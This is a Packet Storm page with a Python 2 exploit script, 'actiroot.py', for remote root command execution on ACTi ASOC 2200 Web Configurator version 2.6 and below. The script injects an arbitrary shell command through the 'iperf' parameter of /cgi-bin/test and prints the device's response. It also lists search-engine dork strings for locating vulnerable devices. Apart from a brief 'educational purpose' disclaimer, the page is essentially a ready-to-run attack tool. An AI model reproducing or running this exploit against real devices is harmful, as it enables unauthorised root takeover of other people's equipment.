ACTi ASOC 2200 Web Configurator versions 2.6 and below remote root command execution exploit. This is a secondary version of the original and is written in Python.
41a108b19f2cd58cd1b3bf78f695f0fc0293c132dc307dfb6fe1b4b8907d2d97#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname : actiroot.py
# Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version :
# About : ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, qk, marezzi, StRoNiX, t0r3x, fx0, TraXdata, v0da and all members of ex darkc0de.com, ljuska.org and rev3rse.org
#
#
# Example of use : ./actiroot.py target cmd
# Based on http://packetstormsecurity.org/files/view/99414/actiasoc-exec.txt, so all credits go to original author ...
import sys, os, time, urllib2, re
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = ' clear'
else:
clearing = 'cls'
os.system(clearing)
R = "\033[31m";
G = "\033[32m";
def logo():
print G+"\n|---------------------------------------------------------------|"
print "| |"
print "| b4ltazar[@]gmail[dot]com |"
print "| 03/2011 actiroot.py |"
print "| ACTi Corporation remote root |"
print "| |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s\n" % time.strftime("%X")
if len(sys.argv) != 3:
logo()
print "Usage: ./actiroot.py TARGET CMD"
sys.exit(0)
target = sys.argv[1]
cmd = sys.argv[2]
logo()
exploit = "http://"+target+"/cgi-bin/test?iperf=;"+cmd+" &"
print G+"[+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution"
print "[+] Gd0rk: intitle:Web Configurator - Version v2.6"
print " inurl:videoconfiguration.cgi"
print "[+] Target: ",target
print "[+] Command: ",cmd
print "[+] Exploit: ", exploit
print "[!] Trying to exploit ..."
print "[+] Please wait ..."
try:
target = "http://"+target
root = urllib2.urlopen(target+"/cgi-bin/test?iperf=;"+cmd)
root = root.read()
if re.findall("execute", root):
print "[!] w00t,w00t!!! Exploit works ...\n"
print R+root
print G+"\n[!] Exiting ..."
else:
print "[-] Sorry, exploit failed !"
print "\n[!] Exiting ..."
except(KeyboardInterrupt, SystemExit):
pass
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed